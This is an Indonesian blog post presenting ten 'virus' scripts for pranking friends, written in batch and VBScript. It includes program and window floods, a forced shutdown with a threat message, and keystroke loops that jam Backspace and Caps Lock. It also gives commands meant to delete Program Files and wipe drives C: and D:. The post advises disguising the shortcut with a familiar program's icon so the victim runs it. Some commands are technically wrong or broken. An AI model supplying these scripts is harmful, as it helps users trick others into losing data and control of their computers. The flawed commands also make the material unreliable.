Minggu, 26 Maret 2017

10 Cara Membuat Virus Komputer CMD Notepad Untuk Isengin Teman


Cara membuat virus bahaya dengan notepad, cmd dan tanpa software apapun, kali ini saya akan bahas. Mungkin kadang kadang kita sebagai teman merasa gemes terhadap teman kita sendiri, entah memang orangnya terlalu alay, rusuh, resek ataupun lainnya. Setidaknya jangan menggunakan trik dibawah ini secara berlebihan karena juga nantinya akan kasihan, komputer ataupun laptopnya menjadi bermasalah apalagi sampai data datanya juga ikut rusak.


Software Yang Dibutuhkan
  • Notepad saja Tapi di rubah menjadi file. Bat Caranya : Klik kanan -> Rename -> nama.bat


10 Cara Membuat Virus Komputer Dengan Notepad – CMD

Kali ini akan berbagi bagaimana cara membuat virus sederhana dan tidak terdeteksi oleh antivirus apapun karena script ini sebenarnya memanfaatkan perintah dari sebuah instruksi yang tertanam pada produknya windows. Berikut ini 10 cara yang dapat anda coba untuk isengin teman, namun jangan keterlaluan ya :



1. FLOOD Windows Explorer
 
Ganti Icon Bat Dengan Yang Lain - cara membuat virus copy of shortcut
Ganti Icon Bat Dengan Yang Lain - cara membuat virus copy of shortcut

Kenapa saya kasih nama flood windows explorer? Karena pada kali ini kita akan membuat virus yang dapat membuka windows explorer dalam jumlah yang anda tentukan (10, 20, 100, 1000 dan seterusnya), bahkan bisa membuat komputer anda hang seketika. Nah untuk membuatnya cukup sederhan :
  • Buka notepad
Ketikan di notepad seperti ini :
C:\windows\explorer.exe
C:\windows\explorer.exe
C:\windows\explorer.exe
C:\windows\explorer.exe
C:\windows\explorer.exe

Simpan dengan nama terserah dan diakhiri .bat contoh virus1.bat. jalankan dan hasilnya akan membuka explorer sebanyak anda tulis, contoh diatas akan membuka windows explorer dalam jumlah 5.


Untuk isengin teman anda, copy shorcut file virus1.bat ke desktop dan ganti iconnya menjadi browser, photoshop atau lainnya agar ketika si pemilik laptop tertipu dengan tampilan shorcutnya.



2. FLOOD Program

Flood Program - cara membuat virus komputer dengan cmd notepad

Pada contoh kali ini, hampir mirip dengan virus nomor satu. Terkadang laptop yang dimiliki teman anda memiliki spesifikasi yang cukup tinggi, dan membuka 1000 explorer pun tidak akan masalah serta tidak akan hang sedikit pun. Nah kali ini bagaimana dengan program program campuran khususnya yang berat berat contohnya adalah firefox, adobe photoshop dan sebagainya.


Contoh skrip virus membuka program opera dan mozilla firefox otomatis 1x klik:
cd\
"Program Files (x86)"\opera\launcher.exe

cd\
"Program Files (x86)"\"Mozilla Firefox"\firefox.exe

Simpan dengan nama virus2.bat. Bisa anda kreasikan sendiri dengan program program yang di laptop teman anda.



3. FLOOD Folder Spam Secara Otomatis dan Nama Yang Kita Inginkan

Nah kali ini, sobat bisa mengkreasikan dengan kombinasi virus shorcut yang di tempel di dekstop dan tentunya iconnya diganti dengan program yang ada di desktop teman sobat. FLOOD Folder spam merupakan sebuah perintah dari cmd yang dapat membuat folder, dengan menggunakan “MKDIR” maka kita dapat membuat folder folder secara otomatis dan diberi nama sesuai yang kita inginkan. Dari pada bingung copy paste cara dibawah ini :



Contoh saya akan membuat folder spam di directory D: , yang terbuat otomatis dengan nama incaralaptop, jessica, dan Kuantum
D:
mkdir incaralaptop
mkdir jessica
mkdir kuantum

Simpan virus3.bat, hasilnya seperti dibawah ini :

Membuat Folder Otomatis Dengan Nama Sesuai Keinginan - cara membuat virus komputer tanpa software
Membuat Folder Otomatis Dengan Nama Sesuai Keinginan - cara membuat virus komputer tanpa software





4. FLOOD CMD (Membuka CMD Dengan Jumlah Yang Banyak)

CMD dalam jumlah ribuan juga menjadi salah satu cara isengin teman kita, bahkan terkadang tampilan hitam seperti cmd ini dianggap sebagai virus yang hebat,  sehingga teman anda melakukan install ulang (Berlaku untuk orang awam :D). Untuk membuatnya sangat mudah, anda tinggal mengetikan perintah “start” dengan demikian akan muncul satu jendela cmd. Copy paste hingga 2000x dijamin teman anda akan kualahan melakukan closing.


Script virus :
Start
Start
Start
Start
Simpan dengan nama viruscmd4.bat


Hasil :





5. Shutdown Otomatis Disertai Pesan Ancaman

Cara membuat virus cmd memang sangat banyak sekali, salah satunya yang paling mengerikan adalah shutdown secara paksa dan tidak bisa dicancel. Untuk mencancel shutdown harus mengetikan perintah di cmd yaitu “shutdown –a” dengan demikian shutdown bisa di gagalkan. Namun bagaimana  dengan orang awam? Tentu sangat kebingungan.


Yuk kita langsung pembuatan virusnya saja :
shutdown -s -f -t 2000 -c "incaralaptop hanya berbagi ilmu"

Simpan dengan nama virus5.bat dan coba jalankan. Untuk tampilan shutdown pada windows 8 seperti ini namun untuk windows xp lebih mengerikan.
Hasil :

Cara Membuat virus bahaya dengan Notepad Shutdown Secara Paksa
Cara Membuat virus bahaya dengan Notepad Shutdown Secara Paksa



6. Membuat Tombol Backspace Selalu Menekan


Nah tips yang keenam adalah cara membuat virus komputer sederhana namun sedikit mematikan. Namun yang terpenting adalah jangan menaruh file *.bat ini di dalam startup karena kasihan bagi teman teman yang tidak mengetahui cara mengatasinya.


Virus no 6 ini akan membuat tombol keyboard akan menekan tombol Backspace secara terus menerus walaupun kita sendiri tidak menekannya. Untuk antisipasinya tinggal di restart saja dan virusnya jangan di taruh di startup agar tidak berjalan otomatis.



MsgBox "Backspace Error Mohon Install Ulang"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Simpan dengan nama virus6.vbs dan jalankan. Untuk cara mengembalikan restart terlebih dahulu dan hapus. (ingat jangan di taruh di start up)



7. Membuat Caps Lock Terus Menyala


Virus ini juga sedikit berbahaya, namun akan lebih gunakan secara bijak dan jangan terlalu berlebihan. Membuat caps lock menyala terus menerus akan mengakibatkan text keyboard yang anda ketik selalu huruf besar semua. Walaupun caps lock sudah dimatikan, akan tetap terus aktif hingga komputer itu di restart.


Berikut ini script virusnya :

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Simpan dengan nama virus7.vbs dan jalankan





8. Membuat DVD/CDROOM Selalu Keluar Dengan Sendirinya


Mungkin ini seperti terkesan horor dan banyak mengira kalau tombol switch CD-ROM/DVD rusak padahal sebenarnya adalah ulah dari sebuah virus. Hal ini sebenarnya mengubah code eject pada windows explorer selalu aktif, untuk manualnya sangat mudah sekali yaitu bukalah windows explorer -> klik kanan pada CD/DVD ROOM anda -> klik kanan -> Eject.


Dari situ kita akan mengaktifkan menjadi Not Null dan terus menerus aktif dengan menggunakan code vbs yang kita tulis dengan notepad. Berikut ini code script virusnya :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Simpan dengan nama virus8.vbs 




9. Membuat Semua Programnya Rusak Dan Hilang (Kecuali Windowsnya)

Untuk tingkatan membuat virus berbahaya adalah dengan merusak sesuatu yang ada di programnya. Namun saya ingatkan untuk tidak menggunakan trik nomor 9 ini karena kasihan teman anda dikerjain yang sangat keterlaluan. Mengingat program yang terinstall juga termasuk penting, maka dari itu bila terhapus juga akan menghambat pekerjaannya.

Contoh script menghapus semua program yang ada di program file
CD\
DEL "Program Files (x86)" /F

Simpan dengan nama virus9.bat dan ketika menjalankan akan diberikan notifikasi Y/N. Tekan Y (untuk menjalankan) dan tekan N (Cancel)



10. Menghapus Semua Data Di Hardisk

Virus yang sangat berbahaya dan tidak dapat terdeteksi oleh anti virus karena memanfaatkan perintah dari command prompt itu sendiri. Nah kali ini kita akan membuat suatu virus yang dapat menghapus semua data di hardisk, namun sebaiknya jangan dilakukan pada teman anda sendiri, anda boleh belajar ini di tempat tempat rental warnet karena mereka kebanyakan memasang deepfreeze sehingga data tidak akan hilang walaupun anda menggunakan trik ini.

@echo off
DEL C: -Y
DEL D: -Y

Simpan dengan nama virus10.bat, ingat JANGAN SEKALI NGKLIK karena dapat berakibat fatal. Cobalah untuk belajar di warnet warnet terdekat.






Keimpulan :
Nah itu dia virus yang memanfaatkan dari perintah perintah command prompt yang dapat kita jalankan melalui notepad. Namun kita gunakan secara bijak agar tidak merugikan orang lain. Semoga bermanfaat ya ilmunya terima kasih by  incaralaptop

0 komentar

Posting Komentar

Jangan Nyepam ya Gan ~ ^.^